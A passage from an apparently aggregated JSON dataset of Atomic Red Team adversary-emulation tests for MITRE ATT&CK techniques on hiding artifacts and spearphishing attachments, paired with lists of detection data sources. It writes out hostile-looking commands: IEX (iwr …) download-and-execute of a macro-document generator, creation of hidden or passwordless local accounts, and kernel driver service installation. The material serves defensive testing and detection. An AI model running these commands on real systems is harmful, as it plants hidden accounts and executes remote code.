Files\\Oracle\\VirtualBox\\drivers\\VboxDrv.sys\" type= kernel start= auto error= normal displayname= PortableVBoxDRV\nsc start VBoxDRV\n", + "cleanup_command": "sc stop VBoxDRV\nsc delete VBoxDRV\nregsvr32 /u /S \"C:\\Program Files\\Oracle\\VirtualBox\\VboxC.dll\"\nmsiexec /x #{msi_file_path} /qn\n", + "name": "command_prompt" + } + }, + { + "name": "Create and start VirtualBox virtual machine", + "auto_generated_guid": "88b81702-a1c0-49a9-95b2-2dd53d755767", + "description": "Create a simple VirtualBox VM and start up the machine\nCleanup command stops and deletes the newly created VM and associated files\nhttps://www.virtualbox.org/manual/ch08.html#vboxmanage-startvm\nhttps://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/\nhttps://attack.mitre.org/techniques/T1564/006/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "vm_name": { + "description": "Name of the new virtual machine", + "type": "String", + "default": "Atomic VM" + }, + "virtualbox_exe": { + "description": "Path to the VirtualBox executable", + "type": "Path", + "default": "C:\\Program Files\\Oracle\\VirtualBox\\VirtualBox.exe" + }, + "vboxmanage_exe": { + "description": "Path to the executable for VBoxManage, the command-line interface to VirtualBox", + "type": "Path", + "default": "C:\\Program Files\\Oracle\\VirtualBox\\VBoxManage.exe" + }, + "virtualbox_download": { + "description": "URL for the current installer for the Windows version of VirtualBox, as of March 2022", + "type": "Url", + "default": "https://download.virtualbox.org/virtualbox/6.1.32/VirtualBox-6.1.32-149290-Win.exe" + }, + "virtualbox_installer": { + "description": "Executable for the Virtualbox installer", + "type": "String", + "default": "VirtualBox-6.1.32-149290-Win.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "VirtualBox must exist on disk at specified locations (#{virtualbox_exe})\n", + 
"prereq_command": "if (Test-Path \"#{virtualbox_exe}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "$wc = New-Object System.Net.WebClient\n$wc.DownloadFile(\"#{virtualbox_download}\",\"$env:TEMP\\#{virtualbox_installer}\")\nstart-process -FilePath \"$env:TEMP\\#{virtualbox_installer}\" -ArgumentList \"--silent\" -Wait\n" + }, + { + "description": "VBoxManage must exist on disk at specified locations (#{vboxmanage_exe})\n", + "prereq_command": "if (Test-Path \"#{vboxmanage_exe}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "$wc = New-Object System.Net.WebClient\n$wc.DownloadFile(\"#{virtualbox_download}\",\"$env:TEMP\\#{virtualbox_installer}\")\nstart-process -FilePath \"$env:TEMP\\#{virtualbox_installer}\" -ArgumentList \"--silent\" -Wait\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "\"#{vboxmanage_exe}\" createvm --name \"#{vm_name}\" --register\n\"#{vboxmanage_exe}\" modifyvm \"#{vm_name}\" --firmware efi\n\"#{vboxmanage_exe}\" startvm \"#{vm_name}\"\n", + "cleanup_command": "\"#{vboxmanage_exe}\" controlvm \"#{vm_name}\" poweroff\n\"#{vboxmanage_exe}\" unregistervm \"#{vm_name}\" --delete" + } + }, + { + "name": "Create and start Hyper-V virtual machine", + "auto_generated_guid": "fb8d4d7e-f5a4-481c-8867-febf13f8b6d3", + "description": "Create a simple Hyper-V VM (Windows native hypervisor) and start up the machine\nCleanup command stops and deletes the newly created VM\nhttps://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v\nhttps://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/\nhttps://attack.mitre.org/techniques/T1564/006/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "vm_name": { + "description": "Name of the new virtual machine", + "type": "String", + "default": "Atomic VM" + } + }, + "dependencies": [ + { + "description": "Hyper-V must be enabled on the system\nChecks whether Hyper-V 
is enabled. If not, enables Hyper-V and forces a required restart\n", + "prereq_command": "if ((Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V).State = \"Enabled\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All -Force\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "$VM = \"#{vm_name}\"\nNew-VM -Name $VM -Generation 2\nSet-VMFirmware $VM -EnableSecureBoot Off\nStart-VM $VM", + "cleanup_command": "Stop-VM $VM -Force\nRemove-VM $VM -Force" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": 
"file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": 
"service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + 
"external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1564", + "command_list": [ + "$macro = [System.IO.File]::ReadAllText(\"PathToAtomicsFolder\\T1564\\src\\T1564-macrocode.txt\")\n$macro = $macro -replace \"aREPLACEMEa\", \"PathToAtomicsFolder\\T1564\\bin\\extractme.bin\"\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroCode \"$macro\" -officeProduct \"Word\" -sub \"Extract\" -NoWrap\n", + "net user $ ATOMIC123! 
/add /active:yes", + "New-LocalUser -Name \"Administrator \" -NoPassword" + ], + "commands": [ + { + "command": "$macro = [System.IO.File]::ReadAllText(\"PathToAtomicsFolder\\T1564\\src\\T1564-macrocode.txt\")\n$macro = $macro -replace \"aREPLACEMEa\", \"PathToAtomicsFolder\\T1564\\bin\\extractme.bin\"\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroCode \"$macro\" -officeProduct \"Word\" -sub \"Extract\" -NoWrap\n", + "source": "atomics/T1564/T1564.yaml", + "name": "Atomic Red Team Test - Hide Artifacts" + }, + { + "command": "net user $ ATOMIC123! /add /active:yes", + "source": "atomics/T1564/T1564.yaml", + "name": "Atomic Red Team Test - Hide Artifacts" + }, + { + "command": "New-LocalUser -Name \"Administrator \" -NoPassword", + "source": "atomics/T1564/T1564.yaml", + "name": "Atomic Red Team Test - Hide Artifacts" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1564", + "display_name": "Hide Artifacts", + "atomic_tests": [ + { + "name": "Extract binary files via VBA", + "auto_generated_guid": "6afe288a-8a8b-4d33-a629-8d03ba9dad3a", + "description": "This module extracts a binary (calc.exe) from inside of another binary. \n\nIn the wild maldoc authors will use this technique to hide binaries inside of files stored \nwithin the office document itself. An example of this technique can be seen in sample\n\nf986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226\n\nThis sample contains a document inside of itself. Document 1 is the actual maldoc itself, document 2\nis the same document without all the malicious code. Document 1 will copy Document 2 to the file system\nand then \"peek\" inside of this document and pull out the oleObject.bin file. 
Contained inside of this\noleObject.bin file is a payload that is parsed out and executed on the file system.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft Word must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"Word.Application\" | Out-Null\n Stop-Process -Name \"winword\"\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft Word manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "$macro = [System.IO.File]::ReadAllText(\"PathToAtomicsFolder\\T1564\\src\\T1564-macrocode.txt\")\n$macro = $macro -replace \"aREPLACEMEa\", \"PathToAtomicsFolder\\T1564\\bin\\extractme.bin\"\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroCode \"$macro\" -officeProduct \"Word\" -sub \"Extract\" -NoWrap\n", + "cleanup_command": "Remove-Item \"$env:TEMP\\extracted.exe\" -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Create a Hidden User Called \"$\"", + "auto_generated_guid": "2ec63cc2-4975-41a6-bf09-dffdfb610778", + "description": "Creating a user with a username containing \"$\"", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "net user $ ATOMIC123! 
/add /active:yes", + "cleanup_command": "net user $ /DELETE 2>&1" + } + }, + { + "name": "Create an \"Administrator \" user (with a space on the end)", + "auto_generated_guid": "5bb20389-39a5-4e99-9264-aeb92a55a85c", + "description": "Creating a user with a username containing with a space on the end", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "New-LocalUser -Name \"Administrator \" -NoPassword", + "cleanup_command": "Remove-LocalUser -Name \"Administrator \" 2>&1 | out-null" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was 
created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account creation", + "description": "A user account was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account metadata", + "description": "Data and information that describe a user account and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "user" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": 
"process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + 
"host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": 
"process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + null, + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ] + ] + }, + { + "technique_id": "T1566.001", + "command_list": [ + "$url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest -Uri $url -OutFile 
$env:TEMP\\PhishingAttachment.xlsm\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\n$macrocode = \" Open `\"C:\\Users\\Public\\art.jse`\" For Output As #1`n Write #1, `\"WScript.Quit`\"`n Close #1`n Shell`$ `\"ping 8.8.8.8`\"`n\"\nInvoke-MalDoc -macroCode $macrocode -officeProduct \"#{ms_product}\"\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\n$macrocode = \" Open `\"#{jse_path}`\" For Output As #1`n Write #1, `\"WScript.Quit`\"`n Close #1`n Shell`$ `\"ping 8.8.8.8`\"`n\"\nInvoke-MalDoc -macroCode $macrocode -officeProduct \"Word\"\n" + ], + "commands": [ + { + "command": "$url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest -Uri $url -OutFile $env:TEMP\\PhishingAttachment.xlsm\n", + "source": "atomics/T1566.001/T1566.001.yaml", + "name": "Atomic Red Team Test - Phishing: Spearphishing Attachment" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\n$macrocode = \" Open `\"C:\\Users\\Public\\art.jse`\" For Output As #1`n Write #1, `\"WScript.Quit`\"`n Close #1`n Shell`$ `\"ping 8.8.8.8`\"`n\"\nInvoke-MalDoc -macroCode $macrocode -officeProduct \"#{ms_product}\"\n", + "source": "atomics/T1566.001/T1566.001.yaml", + "name": "Atomic Red Team Test - Phishing: Spearphishing Attachment" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = 
[Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\n$macrocode = \" Open `\"#{jse_path}`\" For Output As #1`n Write #1, `\"WScript.Quit`\"`n Close #1`n Shell`$ `\"ping 8.8.8.8`\"`n\"\nInvoke-MalDoc -macroCode $macrocode -officeProduct \"Word\"\n", + "source": "atomics/T1566.001/T1566.001.yaml", + "name": "Atomic Red Team Test - Phishing: Spearphishing Attachment" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1566.001", + "display_name": "Phishing: Spearphishing Attachment", + "atomic_tests": [ + { + "name": "Download Macro-Enabled Phishing Attachment", + "auto_generated_guid": "114ccff9-ae6d-4547-9ead-4cd69f687306", + "description": "This atomic test downloads a macro enabled document from the Atomic Red Team GitHub repository, simulating an end user clicking a phishing link to download the file.\nThe file \"PhishingAttachment.xlsm\" is downloaded to the %temp% directory.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest -Uri $url -OutFile $env:TEMP\\PhishingAttachment.xlsm\n", + "name": "powershell", + "cleanup_command": "Remove-Item $env:TEMP\\PhishingAttachment.xlsm -ErrorAction Ignore\n" + } + }, + { + "name": "Word spawned a command shell and used an IP address in the command line", + "auto_generated_guid": "cbb6799a-425c-4f83-9194-5447a909d67f", + "description": "Word spawning a command prompt then running a command with an IP address in the command line is an indiciator of malicious activity.\nUpon execution, CMD will be lauchned and ping 8.8.8.8\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "jse_path": { + "description": "Path for the macro to write out the 
